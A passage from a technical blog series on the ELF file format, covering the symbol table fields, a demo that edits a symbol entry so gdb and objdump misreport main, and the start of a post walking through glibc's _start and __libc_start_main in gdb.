<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Xword</b><span style="white-space: pre;"> </span>st_size; /* (8 bytes) Symbol size */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">} <b>Elf64_Sym</b>;</span><br />
<div>
<br /></div>
I've added the type size so you don't need to scratch through the <span style="font-family: "courier new" , "courier" , monospace;">typedefs</span> to figure this out, you're welcome!<br />
<br />
<i>So the way I like to think about this is:</i> Because the order and sizes of this field we can quickly notice that the first 8 bytes (<span style="font-family: "courier new" , "courier" , monospace;">st_name, st_info,st_other,st_shndx</span>) acts like kind of a <i>meta-data header</i>, it allows determination of the attributes of the symbol and everything after that points to the actual value that the symbol holds (<i>its address, offset etc - this depends on the values in the first 8 bytes some what</i>).<br />
<br />
Okay so what do these fields mean?<br />
<ul style="text-align: left;">
<li><b><span style="font-family: "courier new" , "courier" , monospace;">st_name</span></b> - the index in the <span style="font-family: "courier new" , "courier" , monospace;">.strtab</span> that holds the first byte in the null terminated name of the symbol. Not all symbols have names, when they don't this section will hold a value of <span style="font-family: "courier new" , "courier" , monospace;">0x0000</span>.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_info</b></span> - Field of bits that determines a few attributes for the symbol. Namely the "scope" and the type of symbol in the c program this is meant to aid relocation for. It will indicate whether it is a function or variable or something else. The way this works is pretty much like every bit field, in true C style, it gets passed through a Macro. This Macro applies bitmasks, shifts to isolate the offsets in the bitfield dedicated to certain attributes. Here's the code for processing this field on 64bit architectures (extract from <b><span style="font-family: "courier new" , "courier" , monospace;">glibc/elf/elf.h:570-579</span></b>):</li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 570 /* How to extract and insert information held in the st_info field. */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 572 #define <b>ELF32_ST_BIND</b>(val)\</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> (((unsigned char) (val)) >> 4)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 573 #define <b>ELF32_ST_TYPE</b>(val)\</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> ((val) & 0xf)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 574 #define <b>ELF32_ST_INFO</b>(bind, type) \</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> (((bind) << 4) + ((type) & 0xf))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 576 /* Both Elf32_Sym and Elf64_Sym use the same one-byte st_info field. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 577 #define <b>ELF64_ST_BIND</b>(val) ELF32_ST_BIND (val)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 578 #define <b>ELF64_ST_TYPE</b>(val) ELF32_ST_TYPE (val)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 579 #define <b>ELF64_ST_INFO</b>(bind, type) ELF32_ST_INFO ((bind), (type))</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_other</b></span><span style="font-family: inherit;"> - This is a bit field used to determine the visibility of the symbol. An attribute that controls how code is allowed to reference the variable per certain contexts. Here's the macro glibc uses to pull out the visibility value:</span></li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 617 /* How to extract and insert information held in the st_other field. */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 618 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 619 #define <b>ELF32_ST_VISIBILITY</b>(o) ((o) & 0x03)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 620 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 621 /* For ELF64 the definitions are the same. */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 622 #define <b>ELF64_ST_VISIBILITY</b>(o) ELF32_ST_VISIBILITY (o)</span></div>
</div>
</div>
</div>
<div>
<br /></div>
<div>
Visibility types for symbols include (<i>also available from the diagram above</i>):</div>
<br />
<ul style="text-align: left;"><ul>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_DEFAULT 0x00</b></span> - which means this is the default visibility rules</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_INTERNAL 0x01</b></span> - Processor specific hidden class</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_HIDDEN 0x02</b></span> - means this symbol is not available for reference in other modules</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_PROTECTED 0x03</b> </span>- Documentation refers to this as a protected symbol. I <a href="https://www.airs.com/blog/archives/307">believe</a> the only thing that differs between this and a normal <span style="font-family: "courier new" , "courier" , monospace;">STV_DEFAULT</span> symbols is that it won't be allowed to be overridden when referenced from within its own shared library. </li>
</ul>
</ul>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace; font-weight: bold;">st_shndx</span><span style="font-family: inherit;"> Field indicates the section index associated to this symbol. Symbols are associated to sections this way because everything defined </span><i style="font-family: inherit;">as a symbol</i><span style="font-family: inherit;"> will probably have an associated section -</span><span style="font-family: inherit; font-style: italic;"> for instance where would variable values be defined? Probably the </span><span style="font-family: "courier new" , "courier" , monospace; font-style: italic;">.data</span><i style="font-family: inherit;">*-esq sections no? </i><span style="font-family: inherit;">There are a couple of special section numbers that indicate something about the section related to the symbol these can take a couple values, please check out </span><span style="font-family: "courier new" , "courier" , monospace;">glibc/elf.h:414+</span><span style="font-family: inherit;"> for the range of these values.</span></li>
</ul>
<ul style="text-align: left;">
<li><b><span style="font-family: "courier new" , "courier" , monospace;">st_value</span></b> Value of the symbol this has different interpretations depending on the symbol type: </li>
<ul>
<li>In executable files and shared objects this file holds the virtual address for the symbol's definition. </li>
<li>For relocatable files this value will for the most part indicate the offset for where the symbol is defined.</li>
<li>For Symbols who's <span style="font-family: "courier new" , "courier" , monospace;">st_shndx</span> is a <span style="font-family: "courier new" , "courier" , monospace;">SHN_COMMON</span>, <span style="font-family: "courier new" , "courier" , monospace;">st_value</span> will hold alignment constraints for when its relocated. </li>
</ul>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_size</b></span> Size of of the symbol, indicates how many bytes will be occupied by what this symbol represents depending again on symbol type - <i>for the most part either the size of the data field for a variable or the size of code for a function. </i></li>
</ul>
<br />
Lets take a look at how this information is represented on disk in raw binary:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdvUI6-73TtY2n86sNrc6i4leL8_0NcFmuT6IHOizBRXX48Wbott6dLlZXClXYFzV2TsH_6pelePxKnY4rX99AuCeaEASwnfJbxksyc2ubtbTMSMf-LAUHY1WqVXejCUOqHfLT5RBRnlU/s1600/Symbol+Header+Table+%25283%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="242" data-original-width="1054" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdvUI6-73TtY2n86sNrc6i4leL8_0NcFmuT6IHOizBRXX48Wbott6dLlZXClXYFzV2TsH_6pelePxKnY4rX99AuCeaEASwnfJbxksyc2ubtbTMSMf-LAUHY1WqVXejCUOqHfLT5RBRnlU/s1600/Symbol+Header+Table+%25283%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div>
<br /></div>
I've skipped the first record because its always going to be a null symbol (<i>same goes for the <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span></i>). For the symbol highlighted here we can see the following:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_value</b></span> of the symbol is set to <span style="font-family: "courier new" , "courier" , monospace;">0x400238</span>, which means it will appear this virtual address</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_size</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0</span> which means it won't take up any space in the binary during execution and probably doesn't define a variable.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_info</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x03</span> which means the symbol type is <span style="font-family: "courier new" , "courier" , monospace;">SECTION</span> which means its a symbol associated to a section. And Bind type is then <span style="font-family: "courier new" , "courier" , monospace;">LOCAL</span> which means it is defined in the current object file.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_other</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x00</span> which means its visibility will be <span style="font-family: "courier new" , "courier" , monospace;">STV_DEFAULT</span> </li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_name</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x000000</span> which means</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_shndx</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x01</span> which means it is associated to the section defined at index 1 in the section table. If you haven't guessed this is for the<span style="font-family: "courier new" , "courier" , monospace;"> .interp</span> section. </li>
</ul>
<div>
<i>I took the first non-null symbol entry and expanded on it but there are always more elaborate examples to draw on, make sure to pop open hexdump and reverse engineer some of these structures yourslef ;)</i><br />
<br />
We are not going to cover relocations just yet I thought the post might be a bit lengthy and bloated. For now we are going to treat the symbols as a piece of meta-data on its own and worry about how the dynamic linker might make use of them.<br />
<br /></div>
<div>
That's pretty much it as far as the symbol table goes lets see if we can pull off some tricks!</div>
<h2 style="text-align: left;">
Elf Symbol Sorcery</h2>
<div>
"Signs and symbols rule the world, not words nor laws" - Confucius<br />
<br />
So we know that there are some programs that rely on symbol information; these are things like <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> and <span style="font-family: "courier new" , "courier" , monospace;">gdb</span> . What we're going to do is replace a symbol for a function with another one, and then see what <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> and <span style="font-family: "courier new" , "courier" , monospace;">gdb</span> makes of this.<br />
<br />
So this is me placing the address of the <span style="font-family: "courier new" , "courier" , monospace;">main</span> method in the symbol table with the one for <span style="font-family: "courier new" , "courier" , monospace;">never_call</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigCcZl6rrkcJZYeiFMqaXC4bkaca_zo2cuP0wgo67obMULxTejIPvLOeBUBgvEHodTORW6dp-RevJz5QEAlHdFz8Zgcs1ig-zggpZI8_PrwaPw1S96dBtZrFh1mOZ3PWoKhk6Pgav9hQY/s1600/ELfSymbolSorcery.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="1263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigCcZl6rrkcJZYeiFMqaXC4bkaca_zo2cuP0wgo67obMULxTejIPvLOeBUBgvEHodTORW6dp-RevJz5QEAlHdFz8Zgcs1ig-zggpZI8_PrwaPw1S96dBtZrFh1mOZ3PWoKhk6Pgav9hQY/s1600/ELfSymbolSorcery.png" /></a></div>
<br />
<br />
Just in case you're curious, yes the binary does still run completely as intended; <span style="font-family: "courier new" , "courier" , monospace;">never_call() </span>is uhm never called, but something interesting happens when we disassemble <span style="font-family: "courier new" , "courier" , monospace;">main</span> in gdb:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLQwtlZh-4yxMv4e-58lKcUXC-oyT7n_6i8rGuy51Z5Ad70B8kLmvfTwbvUwarbaz6IfF2X5h7H6BpmjGhxMxBzdYnE5UUcyATZUnIkHmNFPdv_c6cQawigL8jtuIEJL2VeM6uJYFk6CI/s1600/gdb_wrong_main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="166" data-original-width="1300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLQwtlZh-4yxMv4e-58lKcUXC-oyT7n_6i8rGuy51Z5Ad70B8kLmvfTwbvUwarbaz6IfF2X5h7H6BpmjGhxMxBzdYnE5UUcyATZUnIkHmNFPdv_c6cQawigL8jtuIEJL2VeM6uJYFk6CI/s1600/gdb_wrong_main.png" /></a></div>
<br />
Huh? I ask it to disassemble <span style="font-family: "courier new" , "courier" , monospace;">main</span> and it give some code for <span style="font-family: "courier new" , "courier" , monospace;">never_call</span>? I never called for that! (<i>I'm milking this too hard aren't I? hehe</i>). Anyway <span style="font-family: "courier new" , "courier" , monospace;">gdb</span> fell victim to that old symbol magic!<br />
<br />
We can also see that if we ask <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> about the <span style="font-family: "courier new" , "courier" , monospace;">main</span> method it doesn't seem to have some code for it (<i>if you run this grep on an unedited <span style="font-family: "courier new" , "courier" , monospace;">never_call.elf</span> it will show the <span style="font-family: "courier new" , "courier" , monospace;">main()</span> method of course, here it only shows the stub code for <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, which eventually calls main itself - but is a fundamentally different function. </i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Jxye6q1PgAUwzvcqvHhtG5G2LT_L37MT-A9tYT81hRUHJCGXDJJZC9eeflnZjSBXhNL7iD4DfC5Mm1-5xAuF5_aDVEJHRA1KriTadrEPKjd_JOZt-Z6RIStBUowrj-IxSKFuVWLAUWM/s1600/no_main_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="1483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Jxye6q1PgAUwzvcqvHhtG5G2LT_L37MT-A9tYT81hRUHJCGXDJJZC9eeflnZjSBXhNL7iD4DfC5Mm1-5xAuF5_aDVEJHRA1KriTadrEPKjd_JOZt-Z6RIStBUowrj-IxSKFuVWLAUWM/s1600/no_main_function.png" /></a></div>
<br />
<br /></div>
<div>
When I was trying out tricks for this one I accidentally replaced start, so just to confirm that <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> does completely trust the symbol table check out what it says about <span style="font-family: "courier new" , "courier" , monospace;">_start</span>.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMZUikJHrSrRT101oZ8EApgWwugVz8vgygOOEl1jkUvwrMNvLR7RoSW0zUnHeoUfB6tXX4iICeV3VcK43R3Sg1u2rg9be_Ze3o_R1WScfPBUFrazGS-EfnV4PghGQ_S6TV0MMjlM2LRI/s1600/_startmistake.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="582" data-original-width="942" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMZUikJHrSrRT101oZ8EApgWwugVz8vgygOOEl1jkUvwrMNvLR7RoSW0zUnHeoUfB6tXX4iICeV3VcK43R3Sg1u2rg9be_Ze3o_R1WScfPBUFrazGS-EfnV4PghGQ_S6TV0MMjlM2LRI/s1600/_startmistake.png" /></a></div>
<br />
<br />
Now you might wonder how <span style="font-family: "courier new" , "courier" , monospace;">main</span> still gets called? If in my mistake and the previous example we are replacing the symbol pointers for <span style="font-family: "courier new" , "courier" , monospace;">main</span>, why does the proper <span style="font-family: "courier new" , "courier" , monospace;">main</span> still get called?<br />
<br />
Well if you look at the screenshot above you'll see some of the instruction encoding data in the second output column. Look closely at the one at <span style="font-family: "courier new" , "courier" , monospace;">0x40046d</span> (which reads <span style="font-family: "courier new" , "courier" , monospace;">c7 c7 30 04 40 00</span> ). This shows that the address for <span style="font-family: "courier new" , "courier" , monospace;"><a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">main</a></span>, which is passed to <span style="font-family: "courier new" , "courier" , monospace;">rdi</span> ( which is<span style="font-family: "courier new" , "courier" , monospace;"> 0x400430 </span>) is <i>baked</i> into the binary, as in it is passed to <span style="font-family: "courier new" , "courier" , monospace;">_start</span> from outside of the potentially broken functionally of the symbol table. So it will happily march on calling the real main instead of the redirected on in the symbol table.<br />
<br /></div>
<div>
Anyway that's it for this post, stay tuned for the next one! I'll extend our discussion on the Symbols and include a break down of how relocation work. </div>
<h2 style="text-align: left;">
References and Reading:</h2>
<ol style="text-align: left;">
<li><a href="https://gist.github.com/DhavalKapil/2243db1b732b211d0c16fd5d9140ab0b%C2%A0">https://gist.github.com/DhavalKapil/2243db1b732b211d0c16fd5d9140ab0b </a></li>
<li><a href="https://www.intezer.com/executable-and-linkable-format-101-part-3-relocations/%C2%A0">https://www.intezer.com/executable-and-linkable-format-101-part-3-relocations/ </a></li>
<li><a href="https://blogs.oracle.com/solaris/what-are-tentative-symbols-v2">https://blogs.oracle.com/solaris/what-are-tentative-symbols-v2 </a></li>
<li><a href="https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2">https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2</a></li>
<li><a href="https://wiki.osdev.org/ELF_Tutorial">https://wiki.osdev.org/ELF_Tutorial</a> </li>
<li><a href="http://web.mit.edu/freebsd/head/sys/sys/elf64.h">http://web.mit.edu/freebsd/head/sys/sys/elf64.h</a> </li>
<li><a href="https://stackoverflow.com/questions/48181509/how-to-interpret-the-st-info-field-of-elf-symbol-table-section">https://stackoverflow.com/questions/48181509/how-to-interpret-the-st-info-field-of-elf-symbol-table-section</a> </li>
<li><a href="https://binarydodo.wordpress.com/2016/05/12/symbol-binding-types-in-elf-and-their-effect-on-linking-of-relocatable-files/">https://binarydodo.wordpress.com/2016/05/12/symbol-binding-types-in-elf-and-their-effect-on-linking-of-relocatable-files/</a> </li>
<li><a href="https://stackoverflow.com/questions/12697081/what-is-gmon-start-symbol">https://stackoverflow.com/questions/12697081/what-is-gmon-start-symbol</a> </li>
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format</a></li>
<li><a href="https://jvns.ca/blog/2013/12/10/day-40-learning-about-linkers/">https://jvns.ca/blog/2013/12/10/day-40-learning-about-linkers/</a> </li>
<li><a href="https://www.airs.com/blog/archives/42">https://www.airs.com/blog/archives/42</a> </li>
<li><a href="http://www.fcollyer.com/2013/01/04/elf-symbol-visibility-and-the-perils-of-name-clashing/%C2%A0">http://www.fcollyer.com/2013/01/04/elf-symbol-visibility-and-the-perils-of-name-clashing/ </a></li>
</ol>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com1tag:blogger.com,1999:blog-5845671313867906274.post-24696776858834555912018-10-06T01:29:00.003-07:002018-10-06T02:29:25.132-07:00Introduction to the ELF Format (Part V) : Understanding C start up .init_array and .fini_array sections<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:<br />
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>this</li>
</ol>
<br />
In this post I'm going to cover how some of the aspects of C start up and mess around with the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> and <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> sections to show how they work.<br />
<br />
<h2 style="text-align: left;">
C Start Up</h2>
<br />
So something must happen to get your code in the main function running. This process is called the C start up and it essentially involves running all the initialize code, setting up pointers to some important arrays and then branching over to main.<br />
<br />
What the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> method needs to do essentially is perform a function call to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> which is the function that will actually call <span style="font-family: "courier new" , "courier" , monospace;">main()</span>.<br />
<br />
Now if you haven't guessed, this means we need a pointer to the main function as an argument to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>. It has a couple other parameters here they are:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> int argc, char **argv,</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>#ifdef LIBC_START_MAIN_AUXVEC_ARG</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> ElfW(auxv_t) *auxvec,</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>#endif</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> __typeof (main) init,</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> void (*fini) (void),</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> void (*rtld_fini) (void), void *stack_end)</b></span><br />
<div>
<br /></div>
update: I realized that the original version of the post had the wrong function header for start_main, I grabbed this one straight from glibc (<a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L129">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L129</a>)<br />
for an alternative explanation of this check out - <a href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html </a>(sorry no https :( <i>. . . <-- those are my tears for your unborn TLS packets *sniff snff* lol.</i><br />
<br />
So what we have here is:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="font-family: "courier new" , "courier" , monospace;">int (*main)</span><span style="font-family: "courier new" , "courier" , monospace;"> </span></b></span>- no guessing here this is a pointer to the main method in the binary.</li>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>int </b></span><b style="font-family: "courier new", courier, monospace;">argc</b> - the number of arguments passed to the binary from the command line, including the binary's name (<i>we will show this later</i>). </li>
<li><b style="font-family: "courier new", courier, monospace;">char **argv</b> the array holding the actual strings its important to remember some terms here, argv is passed to the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> function via the stack pointers essentially.</li>
</ul>
<li><b><b><span style="font-family: "courier new" , "courier" , monospace;">__typeof (main) init </span></b> </b>- This is a pointer to the function (<span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_init</span>) that handles calling the initializer or constructor functions. I'm going to call this a constructor function "call handler"[see footnote 1]. </li>
</ul>
<ul style="text-align: left;">
<li><b><b><span style="font-family: "courier new" , "courier" , monospace;">void (*fini) (void)</span></b> -</b> this is the analogous function pointer to the one that handles calling destructor functions.</li>
<li><b><b><span style="font-family: "courier new" , "courier" , monospace;">void (*rtld_fini) (void)</span></b> - </b>The destructor function call handler for the dynamic linker, this value is passed to <span style="font-family: "courier new" , "courier" , monospace;">_start</span> via <span style="font-family: "courier new" , "courier" , monospace;">edx</span> from the loader (<i>we will see this being used soon</i>). - I <i>won't get into how the destructor function call handler here works too much, its really a little off track for this discussion but when I cover dynamic linking I'll expand on it more ;) </i></li>
<li><i><b style="font-family: "courier new", courier, monospace; font-style: normal;">void *stack_end </b><span style="font-style: normal;"><span style="font-family: inherit;">end of stack marker.</span></span></i></li>
</ul>
Just to re-iterate all of these wonderful things must be prepared by <span style="font-family: "courier new" , "courier" , monospace;">_start</span> for the call to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, and we also know that <span style="font-family: "courier new" , "courier" , monospace;">rtld_fini</span> is passed to <span style="font-family: "courier new" , "courier" , monospace;">_start</span> via <span style="font-family: "courier new" , "courier" , monospace;">edx</span>.<br />
<br />
Beyond that <span style="font-family: "courier new" , "courier" , monospace;">_start</span> is loaded with a very helpful stack layout that makes locating the argv and argc easy to find. Lets how this is done in a real world example.<br />
<h2 style="text-align: left;">
Reverse Engineering glibc _start</h2>
Here's what start looks like for one of my binaries during execution:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN3X-AE77Sj_XH9ONYfG7J6iBUx1nd4UnuhzElaZUuUusp-WR5rP5VQkqFKgVzkEGjyLFtrYyj92qW5rH74GXjSvV3Q7lKfdsmW7yAtrVXKA_zikNWJYnsLCzZUTbUhylEK7-h_XmgyEU/s1600/dl_fini+pointer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="522" data-original-width="903" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN3X-AE77Sj_XH9ONYfG7J6iBUx1nd4UnuhzElaZUuUusp-WR5rP5VQkqFKgVzkEGjyLFtrYyj92qW5rH74GXjSvV3Q7lKfdsmW7yAtrVXKA_zikNWJYnsLCzZUTbUhylEK7-h_XmgyEU/s1600/dl_fini+pointer.png" /></a></div>
<br />
To clarify what is happening in the figure above. I am here setting a break point to the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> function. I'm highlighting the instruction that was just executed (<i>note the arrow pointing at <span style="font-family: "courier new" , "courier" , monospace;">0x400455 <+5></span>, this means gdb is currently sitting on that instruction</i>).<br />
<br />
Digging into the assembler here the first instruction is essentially to clear out <span style="font-family: "courier new" , "courier" , monospace;">ebp</span>. After this it passes the pointer to <span style="font-family: "courier new" , "courier" , monospace;">rtld_fini</span> from <span style="font-family: "courier new" , "courier" , monospace;">rdx</span> to <span style="font-family: "courier new" , "courier" , monospace;">r9; </span>this is actually prepping it already for its cozy position for the important <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> call. It also saves the value from being destroyed when <span style="font-family: "courier new" , "courier" , monospace;">rdx</span> is used later on.<br />
<br />
What the screen shot above also confirms is that the <span style="font-family: "courier new" , "courier" , monospace;">rdx</span> register does indeed contain a pointer to the <span style="font-family: "courier new" , "courier" , monospace;">dl_fini</span> function; this is shown in the <span style="font-family: "courier new" , "courier" , monospace;">x/64ib $rdx </span>instruction which says: "<i>read 64 instruction bytes from the address stored at rdx</i>" (<i>if you're not super clued up on how gdb's memory examining function <span style="font-family: "courier new" , "courier" , monospace;">x/ </span>works feel free to git guuuuuud by reading through this <a href="https://sourceware.org/gdb/onlinedocs/gdb/Memory.html">documentation</a></i>) . You can of course do this equivalently on <span style="font-family: "courier new" , "courier" , monospace;">r9</span> it will no doubt at this point in execution show the same value - <i>I'm just picking rdx coz I'm used to dealing with it more</i>. Before we dig into this <span style="font-family: "courier new" , "courier" , monospace;">dl_fini</span> function[see footnote 1] lets look at the rest of the instructions in the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> code.<br />
<br />
<br />
The next instruction at <span style="font-family: "courier new" , "courier" , monospace;">0x400455 <+5></span> is a <span style="font-family: "courier new" , "courier" , monospace;">pop</span> into <span style="font-family: "courier new" , "courier" , monospace;">rsi</span> which contains a pointer to the <span style="font-family: "courier new" , "courier" , monospace;">argc.</span>How do we know this? Well we know that this part of the stack contains a pointer to <span style="font-family: "courier new" , "courier" , monospace;">argc</span> because when the program enters for the first time and <span style="font-family: "courier new" , "courier" , monospace;">_start</span> gets called (<i>under the ABI I am running - your's might differ</i>) the stack essentially contains <span style="font-family: "courier new" , "courier" , monospace;">argc</span>, <span style="font-family: "courier new" , "courier" , monospace;">argv</span> and <span style="font-family: "courier new" , "courier" , monospace;">envp </span>we can see this in the following screen dump:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczvWdHhPpqxwsgpcUNcF4jncxWnGslX1P1bgWKk8d3US4dnTMYmStrHga2AS0kIw0P5NKvDPfepC__4bQHDInTFG2fEoVwvXqyDNYV6MrgtBFN-_Hcif5grVfm0CVaYgOhdk3CWDd4K8/s1600/_start+stack+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="634" data-original-width="1057" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczvWdHhPpqxwsgpcUNcF4jncxWnGslX1P1bgWKk8d3US4dnTMYmStrHga2AS0kIw0P5NKvDPfepC__4bQHDInTFG2fEoVwvXqyDNYV6MrgtBFN-_Hcif5grVfm0CVaYgOhdk3CWDd4K8/s1600/_start+stack+%25282%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
